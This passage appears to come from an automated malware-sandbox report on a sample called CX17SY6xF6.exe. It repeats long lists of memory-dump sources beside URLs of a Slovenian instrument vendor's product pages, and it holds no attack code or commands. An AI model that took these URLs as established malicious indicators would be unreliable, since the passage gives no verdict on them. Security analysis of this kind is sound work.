00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/data-loggerji-spominske-enote/hladna-veriga-in-pr
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/data-loggerji-spominske-enote/programska-oprema-z
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/data-loggerji-spominske-enote/rutinske-kontrole/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/data-loggerji-spominske-enote/validacije/
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/katalogi-prospekti-brosure-dokumenti/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/katalogi-prospekti-brosure-dokumenti/kompletni-ka
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/katalogi-prospekti-brosure-dokumenti/prospekti-br
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/prenosni-rocni-merilniki/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/prenosni-rocni-merilniki/ir-termometri/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/prenosni-rocni-merilniki/merilnik-kvalitete-olja-
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/prenosni-rocni-merilniki/prenosni-merilnik-vsebno
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/prenosni-rocni-merilniki/prenosni-merilniki-ph/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/prenosni-rocni-merilniki/prenosni-merilniki-prevo
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/prenosni-rocni-merilniki/prenosni-termometri/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: 